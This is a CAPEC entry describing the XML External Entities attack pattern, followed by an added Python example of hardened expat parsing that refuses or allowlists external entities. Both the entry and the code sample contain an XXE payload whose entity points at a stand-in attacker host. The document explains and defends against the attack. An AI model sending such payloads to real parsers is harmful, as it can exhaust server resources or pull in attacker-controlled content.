CAPEC-221: XML External Entities (Version 2.9)

Attack Pattern ID: 221
Abstraction: Standard
Status: Draft
Completeness: Stub
+ Summary

This attack takes advantage of the entity replacement property of XML where the value of the replacement is a URI. A well-crafted XML document could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.

+ Attack Prerequisites
  • A server that has an implementation that accepts entities containing URI values.

+ Examples-Instances

Description

In this example, the XML parser parses the attacker's XML and opens the malicious URI. The attacker controls the server behind that URI and writes a massive amount of data to the response stream; here the URI points to a very large file transfer.

<?xml version="1.0"?>
<!DOCTYPE bomb [
<!ENTITY detonate SYSTEM "http://www.malicious-badguy.com/myhugefile.exe">
]>
<bomb>&detonate;</bomb>

+ Solutions and Mitigations

This attack may be mitigated by configuring the XML parser not to resolve external entities. If external entities are needed, implement a custom XmlResolver that enforces a request timeout and a data retrieval limit and restricts which resources it can retrieve (for example, to local ones).
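The two parser configurations described above, written as an added example using the expat bindings in Python's standard library (this code is not part of the CAPEC entry). parse_untrusted() refuses every external entity, which is the posture to prefer; parse_with_resolver() shows the fallback with an allowlist and a byte cap. The sample documents, the reserved placeholder host name, the hypothetical "local:" scheme, the LOCAL_ENTITIES dictionary standing in for a real fetch, and MAX_ENTITY_BYTES are all assumptions made for the example.

```python
"""Hardened parsing for the CAPEC-221 pattern (added example, not CAPEC content).

parse_untrusted()     refuses every external entity, the configuration to prefer.
parse_with_resolver() shows the fallback the mitigation describes: a resolver
                      with an allowlist and a byte cap, for the rare case where
                      external entities are genuinely required.
"""
import xml.parsers.expat as expat

# Constructed sample documents. The host name is a reserved placeholder.
HOSTILE_DOC = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE bomb [\n'
    '<!ENTITY detonate SYSTEM "http://attacker.invalid/myhugefile.exe">\n'
    ']>\n'
    '<bomb>&detonate;</bomb>'
)
BENIGN_DOC = '<?xml version="1.0"?><order><item qty="2">widget</item></order>'
ALLOWED_DOC = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE note [\n'
    '<!ENTITY footer SYSTEM "local:footer.txt">\n'
    ']>\n'
    '<note>body &footer;</note>'
)

# Stand-in for the resolver's backing store (assumption: a real resolver would
# read with a socket/file timeout and stop at the byte cap, not do a dict lookup).
LOCAL_ENTITIES = {"local:footer.txt": "-- end of note --"}
MAX_ENTITY_BYTES = 1024


class ExternalEntityRefused(ValueError):
    """The document referenced an external entity the resolver would not supply."""

    def __init__(self, system_id):
        super().__init__(f"refused external entity: {system_id}")
        self.system_id = system_id


def _parse(xml_text, resolver):
    """Parse xml_text, returning (root element name, concatenated character data).

    resolver(system_id) returns the entity text to splice in, or None to refuse.
    """
    parser = expat.ParserCreate()
    refused, root, texts = [], [], []

    def on_external_entity(context, base, system_id, public_id):
        data = resolver(system_id)
        if data is None:
            refused.append(system_id)
            return 0  # returning 0 makes expat abort the parse instead of fetching
        # A child parser inherits our handlers, so entity text lands in `texts`.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(data, True)
        return 1

    def on_start(name, attrs):
        if not root:
            root.append(name)

    # Also refuse external parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = texts.append
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError as exc:
        if refused:
            raise ExternalEntityRefused(refused[0]) from exc
        raise
    return root[0], "".join(texts)


def parse_untrusted(xml_text):
    """Default posture: no external entity is ever resolved."""
    return _parse(xml_text, lambda system_id: None)


def limited_resolver(system_id):
    """Allowlisted, size-capped resolver (hypothetical 'local:' scheme)."""
    if not system_id.startswith("local:"):
        return None  # no http/ftp/file: an attacker-controlled server is never contacted
    data = LOCAL_ENTITIES.get(system_id)
    if data is None or len(data.encode("utf-8")) > MAX_ENTITY_BYTES:
        return None  # unknown resource, or larger than the retrieval limit
    return data


def parse_with_resolver(xml_text):
    """Fallback posture for when external entities are required."""
    return _parse(xml_text, limited_resolver)


if __name__ == "__main__":
    print(parse_untrusted(BENIGN_DOC))
    print(parse_with_resolver(ALLOWED_DOC))
    try:
        parse_untrusted(HOSTILE_DOC)
    except ExternalEntityRefused as err:
        print("blocked:", err)
```

The refused system_id is surfaced in the exception on purpose: logging it gives a detection signal for documents that attempt the pattern, while the parser never contacts the URI. Parameter entity parsing is disabled as well, because an external DTD subset is another route to the same resource consumption.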

+ Content History
Submissions
Submitter: CAPEC Content Team
Organization: The MITRE Corporation
Date: 2014-06-23
Source: Internal_CAPEC_Team

Page Last Updated or Reviewed: December 07, 2015